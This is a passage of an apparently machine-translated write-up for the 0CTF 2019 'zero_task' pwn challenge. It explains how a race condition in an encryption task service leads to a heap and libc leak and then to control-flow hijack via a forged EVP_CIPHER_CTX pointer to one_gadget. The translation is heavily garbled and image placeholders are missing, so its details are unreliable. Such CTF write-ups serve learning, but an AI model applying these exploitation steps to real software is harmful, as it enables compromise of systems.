0CTF 2019 zero_task conditions for competition use-vulnerability warning-the black bar safety net

ID MYHACK58:62201993369
Type myhack58
Reporter 佚名
Modified 2019-03-28T00:00:00


  1. Foreword 0CTF2019 pwn title zerotask, the difficulty in pwn title in the most low, vulnerability for the type of conditions of competition.

  2. Title protection ! Full protection turned on

  3. Title function Topic implements an encryption and decryption function, a total of three functions. !

  4. Create Task 2. Delete the task 3. To perform the task a. Create a task ! This function creates a 0x80 size of the structure. Temporary named task task{+0x00, data +0x08, data_size+0x14 ,KEY +0x34 IV........+ 0x58 EVP_CIPHER_CTX+0x60 task_id +0x68 single list pointer} ! Required input for task_id(task id), encryption or decryption,KEY(32 bytes), IV(16 bytes), DATA_SIZE(to be encrypted or decrypted data length), the DATA to be encrypted or decrypted data. According to DATA_SIZE malloc corresponding to the size of the space. DATA_SIZE At the same time EVP_CIPHER_CTX_new()function will create a EVP_CIPHER_CTX object. Features 1, the order created four heap blocks. Structure task 0x80 size EVP_CIPHER_CTX object, 0xb0 size EVP_CIPHER_CTX object created in the heap block 0x110 size. According to DATA_SIZE allocated heap block. Size b. Delete the task According to the task_id and a single linked list to delete the specified structure body. ! c. To perform the task According to the task_id looking for to the corresponding task structure, and according to the task structure of the implemented encryption or decryption, the encryption or decryption of data stored in the advance a good definition of a heap block. Output the encrypted or decrypted content. Call the limit three times ! ! Thread start after the sleep(2). The presence of significant conditions of competition issues.

  5. Address leak By conditions of competition to achieve the address of the leak. Perform the task thread incoming parameter for the task structure address. Use the ideas: for example, in advance of free fall task2. Call the function 3 encryption task1. Thread sleep period, free out task1. task1 structure will go into tcache list,+0x00 location will be rewritten to another in advance free of task2 structure. At the same time if task1 The DATA_SIZE is large enough, then the task2 of the structure of the content and the EVP_CIPHER_CTX object, EVP_CIPHER_CTX object created in the heap block, according to task2, the DATA_SIZE of the allocated heap block all encrypted output. The output then re-create a new task to maintain the same key to decrypt, can achieve address leakage. Use difficulties and ways to overcome them:

  6. Program to libc for 2. 27 version, the presence of tcache mechanisms, the disclosure requirements of task structure free into the tcache list, according to DATA_SIZE allocated heap block into the unsorted_bin list. Since only a leak of the opportunity must be heap address and the libc address be compromised. Allocation method, DATA_SIZE is set to 0x110 with a EVP_CIPHER_CTX object created in the heap block of the same size, create 4 after release. At this time co-released 4 0x80 size of the heap block. 8 0x110 size of the heap block.
  7. In the above example then free task1 after EVP_CIPHER_CTX object will be released. Cause the encryption exception occurred. To re-create the task causes the task1 structure body to be re-malloc on. Overcome the method. free(1)free(2)free(3)ad(0xa0)ad(0x8) EVP_CIPHER_CTX object as 0xb0 size, co-created 2 0x80 structure, 3 a 0xb0 structure. In this case task1 structure is not malloc, inside the EVP_CIPHER_CTX object is re-created. ! EVP_CipherUpdate for the encryption function. rdi is a EVP_CIPHER_CTX object, the rcx is the encrypted data of the stack block. r8 is encryption size. You can see the encrypted data has been included in the heap address and the libc address. ! !

  8. Code execution With the libc address the need to find a way to control the program flow to jump to the one_gadget, but the program functions not found in the available memory write function. Encryption and decryption of data are placed in an in advance defined the heap block. Conditions of competition do not help us write address. By tracking the encryption program function EVP_CipherUpdate,according to an EVP_CIPHER_CTX object+0x10 data to determine the encryption or decryption. ! I choose to follow the encryption process EVP_EncryptUpdate it. Inside there is a relative call. There will be EVP_CIPHER_CTX +0x0 structure of the randomly named E. The program will call the E structure+0x20 at the means, provided by the test, the[e+0x12],0x10. Using the method it at a glance, by the conditions of competition re-allocated EVP_CIPHER_CTX object, so that its E structure pointing to a heap block. In the heap block in the layout so that[E+0x20]point to one_gadget to complete the exploit. free 1. the free(2)ad(‘0xa0’) !

[1] [2] next